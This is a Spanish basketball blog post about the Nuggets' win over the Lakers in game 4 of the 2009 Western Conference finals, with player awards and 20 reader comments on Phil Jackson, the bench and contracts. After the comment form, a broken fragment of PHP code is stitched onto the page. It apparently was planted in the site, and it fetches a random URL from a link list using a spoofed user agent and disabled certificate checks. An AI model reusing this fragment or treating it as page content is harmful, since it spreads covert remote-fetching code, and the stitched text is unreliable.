Playoffs (25/05/2009): Nuevos tiempos

26 de May de 2009 por MagicJohnson32

Hubo un tiempo, no hace mucho, en el que los Nuggets eran un equipo sin rumbo. Su entrenador apenas se imponía a unos jugadores carentes de toda rigurosidad profesional. “Una banda”, solíamos llamarlos.

Hubo un tiempo, hace bien poco, en el que los Lakers disponían de lo que se consideraba el mejor banquillo de la NBA. No sólo mantenían el tipo mientras daban descanso a los titulares sino que incluso decantaban partidos en favor de la franquicia angelina gracias a un juego dinámico y descarado. “The Bench Mob”, fue el sobrenombre que se les puso.

Definitivamente, aquellos tiempos han pasado. Los Nuggets igualaron anoche las finales del Oeste en una demostración de intensidad y diversidad de opciones que contrastó con lo ofrecido por los Lakers, cada vez más limitados a las aportaciones de Kobe & Pau. El equipo dirigido por George Karl fue un martillo, especialmente sus tres hombres interiores: entre Nenê, Andersen y Martin acumularon 42 rebotes (más que todos los Lakers juntos), 14 de ellos ofensivos, además de 33 puntos. Por ahí se le fue el partido a los Lakers, que más allá de sus dos estrellas y de las aportaciones ofensivas de Bynum, fueron un solar hasta el punto de que el resto de jugadores llevaban 6 de 33 en tiros de campo (18%) cuando el partido ya quedó decantado del lado local. Odom, que se está jugando el último gran contrato de su carrera profesional, no está y ya casi ni se le espera (su máxima anotación en los últimos ocho partidos son 10 puntos), mientras que Ariza realizó un buen trabajo defensivo pero fue un fantasma en ataque.

Ni siquiera la penosa noche de Melo Anthony (afectado por una enfermedad estomacal, firmó un 3 de 16 en tiros de campo) pesó a los Nuggets, gracias al liderazgo de Billups y al despertar de JR Smith, ambos autores de 24 puntos. Y gracias, claro, a la energía de Birdman y el resto del equipo local, infinitamente más intenso, ocasionalmente mucho más duro con la tolerancia de un arbitraje incoherente en cuanto a los contactos y ciego en la lamentable zancadilla de Dahntay Jones sobre Kobe.

Cabría preguntarse también qué pretendía Phil Jackson con sus rotaciones en el último cuarto, cuando mantuvo en el banquillo a Kobe y Pau hasta que restaban poco más de 6 minutos por jugarse. Difícil de decir, aunque visto el hambre de unos y otros, no parece probable que las cosas hubiesen sido diferentes con más minutos para Gasol y Bryant.

De esta manera, la serie regresa a L.A. como se marchó, con un empate, y queda reducida a un apasionante “best of 3”. Mañana por la noche, el decisivo 5º partido.

PREMIOS

MVP: 24 puntos para Billups y 24 para JR Smith, al que ya echábamos en falta. Los 23 puntos de la pareja en el último cuarto certificaron la victoria de Denver.

Sorpresa: Todo jugador de los Nuggets que pisó la cancha más de 10 minutos tuvo una actuación destacada. Ante este juego de equipo es casi imposible plantear defensa.

Decepción: La aportación de Trevor Ariza en estos Playoffs estaba siendo importantísima pero ayer solamente no fue capaz de brillar ofensivamente y se quedó con 3 puntitos. Mención especial para Lamar Odom que todavía no ha comparecido en esta serie.

Esfuerzo en vano: Bryant se fue a los 35 puntos pero necesitó 26 lanzamientos para conseguirlos. Pau Gasol, en cambio, consiguió 21 con un 8 de 11 en tiro, 10 rebotes, 4 asistencias y 3 tapones. Una actuación completísima pero empañada por la derrota.

RAZONES PARA TRASNOCHAR

Con el 2-1 para Orlando y el partido bronco que completamos la otra noche lo normal es que Lebron James esté preparando alguna para hoy. A partir de las 2h30 podremos comprobar si la serie se resuelve casi definitivamente a favor de los de Florida o si los Cavs plantan batalla y vuelven a su casa con la eliminatoria igualada.

Comenta

20 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Sí, hubo un tiempo en el que se consideraba que Phill Jackson era el mejor gestor humano que había habido en la historia del baloncesto. Ahora no es capaz de sacar apenas nada de una plantilla a priori compensada y otros hacen maravillas con Landrys o Andersens cualquieras.
    Odom cada día más hundido, Fisher cada día más acabado, Bynum en su mundo, Farmar o Vujacic desquiciados, Walton inoperante… No sé si es que son tan malos como parece o alguien no está haciendo bien lo que se supone mejor hacía.
    Pero el caso es que a uno siempre le queda la duda de si lo están haciendo tan rematadamente mal adrede, a fin de seguir algún tipo de plan maestro que él tiene en la cabeza. Ese es el efecto místico que causa Phil Jacson en todos nosotros.

    Mientras tanto, Denver logra la mayor diferencia de rebotes en un partido de playoffs de toda la historia y los Lakers apenas han ido por delante durante un par de cuartos de los 16 que hasta ahora ha habido en juego.
    Me parece que Viva_Dirk va a tener que reconocer pronto que están siendo signficativamente superiores.

    A rezar para el próximo partido. Esto cada vez pinta peor.

      Citar

  2. ÑBA dice:
    #2

    Y eso que el rebote era el arma de los Lakers en esta eliminatoria…

    Se repite la historia: los suplentes no huelen la bola; desidia en el parqué; kobe lanzándose las zapatillas (no puede hacer otra cosa)…

    El quinto partido huele a séptimo…

      Citar

  3. Viva_Dirk dice:
    #3

    Bueno Deer, cuando te dejan coger 20 rebotes ofensivos no hace falta que seas mejor que nadie, ganas si o si. Yo en el análisis di como una de las claves la defensa interior, ya ves los números que hicieron anoche tios que son ofensivamente increibles como Kenyon Martin y Andersen.

    Sin esos 20 rebotes el partido habria sido como los anteriores o incluso mas favorable a los Lakers que levantaron una ventaja de +16 hasta dejarla en +4 y entonces empezaron otra vez a permitir rebotes ofensivos.

      Citar

  4. xapa_croack dice:
    #4

    Lo normal era dar descanso al principio del 4o cuarto a pau&kobe, pero claro entonces perdian de 10, y si los dejaba descansar al principio pues seguramente se fueran de 15-17 los nuggets entonces su descanso lo retraso 4 minutos y por eso salieron cuando quedaban 6 minutos.

    Los nuggets parece k no aprenden de errores, en muchas jugadas jugandose los triples sin esperar al rebote ofensivo, la suerte que ayer entraron, incluso el pajarraco loco se tiro uno.

    Y sobre el arbritaje pues la conspiracion empieza ya a pesar pero al reves pq a la NBa le interesa que las finales se vayan al 7o partido (mas partidos mas tele mas dinero), y que se vea el duelo kobe vs lebron (como anticipaba el anuncio de una marca de zapas), pero esperemos k pasen los equipos que juegan en equipo o en baloncesto Orlando y Denver.

      Citar

  5. TheDeerHunter dice:
    #5

    cuando hablas de los que juegan en equipo o en baloncesto Orlando y Denver te refieres a los que más leña están repartiendo en equipo o en balonceso???

    igual Fisher, Bynum, o Walton tienen que ponerse a poner zancadillas o a empujar a jugadores para que se rompan los cuernos contra el tablero para que les otorgues tal consideración…

    Y Melo, JR, Lewis o Turkoglu… son ejemplos de juego generoso y de equipo, vamoshombrenomej*d@$…

    No me parecen Denver u Orlando ejemplos idílicos de nada.

    Están jugando sus bazas y punto, precísamente como Cleveland o Lakers.

    Ahora que si en playoffs vale todo deberían decirlo.

      Citar

  6. Txusma dice:
    #6

    Un salvaje este Danthay Jones. Supongo que le caera alguna cosa por sus acciones.

      Citar

  7. ÑBA dice:
    #7

    A colación de la supuesta inoperancia de Jackson:

    El otro día lo comentaba Daimiel (y yo en mi blog hace unos meses)… Vujacic; Farmar; Walton; Brown… difícilmente tendrían minutos en cualquier otro equipo de la NBA. Simplemente están rindiendo a su altura, los milagros no existen.

      Citar

  8. Txusma dice:
    #8

    Cuando llego Brown cuajo buenos partidos llevando a cabo perfectamente las tareas que se le pidieron. Cuando Walton era el 3 titular de los Lakers se destacaba su inteligencia y su juego completo. El año pasado, Vujacic firmo una muy buena campaña y algo parecido podemos decir de Farmar…
    Ahora de repente, ninguno de estos 4 jugadores tendrian minutos en otro equipo de la NBA q no fueran los Lakers?

      Citar

  9. MagicJohnson32 dice:
    #9

    Según su rendimiento actual no tendrían minutos ni en las pachanguitas que juego yo los jueves.

      Citar

  10. TheDeerHunter dice:
    #10

    A ver… de Walton eso se dice, que es el jugador “Jackson” por antonomasia y, en su caso, puedo admitirlo…

    ¿De Farmar o Vujacic?? Hemos visto muchas cosas buenas a lo largo de estos años… e incluso esta misma temporada. Vujacic el año pasado fue básico para que los Lakers llegaran a la final… de Farmar pues nos hemos quedado un poco estancados este año, pero también se le han visto grandes partidos.
    Incluso Brown… a mí me parece que tienen unas condiciones estupendas para jugar a esto del baloncesto.
    No creo ni de lejos que su altura sea el ridículo que están haciendo.

    Pero incluso te podría admitir que con ellos puedas decir “los milagros no existen” ¿Y de Odom?? ¿y de Bynum?? ¿ellos también serían milagro??
    Pues entonces los cambiamos por los Andersen, Kenyon Martin, Landry, Hayes… y el larguísimo etc de jugadores de los que otros entrenadores sacan muchísimo más jugo (y que seguramente darían su alma por entrenar a estos Lakers)

      Citar

  11. TheDeerHunter dice:
    #11

    Y es que fíjate el rendimiento que le ha sacado Larry Brown incluso a Radmanovic!!!!

      Citar

  12. ÑBA dice:
    #12

    El problema es que Walton; vujacic; Farmar & company han dejado de aportar ese tipo de cosas que debían aportar, y ahí ha empezado el problema.

    Si tienes un abrelatas y de repente deja de ‘abrir latas’ no sirve para otra cosa… entonces deja de ser útil.

    PD: espero que os guste el ejemplo jajajaja

      Citar

  13. aro_pasado_no_newtoniano dice:
    #13

    ¿”The bench mob” es de mobster?

      Citar

  14. TheDeerHunter dice:
    #14

    Me parece perfecto el ejemplo… si Phil Jackson deja de sacar rendimiento a una plantilla a priori aprovechable es que ha dejado de ser útil ¿querías decir esto, no?? ;D

    Yo sólo digo que Phil ha sido dios en esto de ser entrenador… pero sus métodos se estudian desde hace 20 años y también es comprensible que haya perdido parte de su apetito por ganar.
    Desde un tiempo a esta parte ya le han tocado varias veces la cara tácticamente los Larry Brown, Doc Rivers, Sloan, Adelman… pero siempre la culpa había sido hasta del empedrado por su aura divina.
    Creo que ya es hora de darle algún palo que otro cuando comete algunos errores para mí evidentes.

      Citar

  15. Viva_Dirk dice:
    #15

    Bueno ya nos pasó una vez, pero no creo que Larry Brown sea el mejor ejemplo del aprovechamiento que saca a los jugadores. Mira el que sacó de los Knicks y el que ha sacado D’Antoni, mira el que sacó de Hughes y el que sacaron otros. Larry Brown normalmente suele condicionar a los jugadores hasta la extenuación, con los mas limitados y muy disciplinados funciona, con los que no son un muñeco no funciona tanto.

      Citar

  16. Kantonyo dice:
    #16

    Cuando hacemos siempre los analisis de Lakers nos olvidamos del conjunto rival. Tanto Houston como Denver son grandes plantillas, y cualquier franquicia, llamese Boston, Cleveland u Orlando tendrían muchisimos problemas para vencerlos, por el contrario no veo yo sufriendo mucho a Lakers en una eliminatoria contra Chicago. Por lo tanto es normal que Lakers pierda un partido en Denver, no hay que ser tan pesimista, e incluso si pierde la eliminatoria, estamos hablando de quedar entre los 4 mejores equipos de la NBA….

      Citar

  17. Txusma dice:
    #17

    Ui! Eso no vale para los Lakers y menos este año…

      Citar

  18. TheDeerHunter dice:
    #18

    Eso mismo opino,
    No podemos comparar las exigencias de los Lakers con las de un equipo reventado por las lesiones como Houston o del equipo revelación de la liga como Denver. Una cosa es perder contra el Boston del “Big Three” o contra los Spurs si te ganan por la mano (que ya es doloroso) pero otra muy distinta es ofrecer la imagen dicotómica e indolente que se está ofreciendo este año.
    Es inexplicable estos vaivenes de un partido a otro… y en general es complicado hacer más el ridículo en los que se han perdido. Ya se ha batido algún record negativo que otro esta postemporada… no parece demasiado normal en un equipo que se supone está luchando por el título.

      Citar

  19. Kantonyo dice:
    #19

    Y por que no se le puede exigir lo mismo a Lakers que a Denver?? Que yo sepa el límite salarial de la NBA, provoca que todos los equipos dispongan de las mismas posibilidades de construir un buen equipo.

    Por cierto hablando de sueldos, cada vez tengo más claro que Lakers la cagó renovando a Bynum por 12M$, un jugador que no ha estado a ese nivel de salario durante más de dos meses seguidos…. Ese sueldo le va a ser un lastre para el futuro, más teniendo en cuenta la edad de Bryant y Gasol, y que Odom y Ariza terminan contrato y va a ser imposible renovarlos….

      Citar

  20. TheDeerHunter dice:
    #20

    ¿quieres decir que tenía la misma exigencia Memphis que Boston este año??
    El límite salarial y los drafts son un buen método para equilibrar la competición, pero en la práctica es evidente que según en que fase se encuentre desarrollado un proyecto un equipo tiene más exigencias que otros.
    Además, el límite salarial lo aplican los equipos conforme a sus posibilidades. No todos están dispuestos a pagar los mismos impuestos de lujo. Y la tradición de cada franquicia es otro grado.

    En definitiva, estos Lakers están diseñados para ganar un título de inmediato y si no lo hacen será un fracaso. Nadie podía pensar al principio de temporada que Denver estaba en condiciones de disputárselo… ni siquiera con la llegada de Billups. Ni siquiera con Orlando pocos se hubieran jugado los cuartos (y su exigencia tampoco era esa)

    Con respecto a Bynum… me parece algo circunstancial hablar ahora de su contrato. Estamos hablando de un jugador extremadamente joven que apunta maneras de super-estrella de la liga (incluso con bastante más recursos que D. Howard) independientemente de las circunstancias que le rodean en estos momentos. Tampoco olvidemos que mientras él se está jugando los cataplines en playoffs y le están cayendo palos hasta en el carnet otros se morían de ganas por pasar algunas rondas en el “March Madness”. Creo que no es lo mismo… y por ahí todavía me acuerdo de los palos que se llevó Lebrón en el cierto mundial FIBA.
    La apuesta había que hacerla sí o sí (con matices, que luego siempre me atacan por el “sí o sí”) y el coste del contrato podemos discutirlo en márgenes, pero se aproxima bastante al valor que se le presuponía al jugador. Como todas las apuestas se puede ganar o perder. Forma parte del juego.

    De Odom y Ariza…. Odom a la puta calle pero ya. A Ariza me apostaría algo gordo a que lo van a renovar… y con él puede pasar tres cuartos de lo mismo. Lo renovarán por un pico y veremos si termina cumpliendo las expectativas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>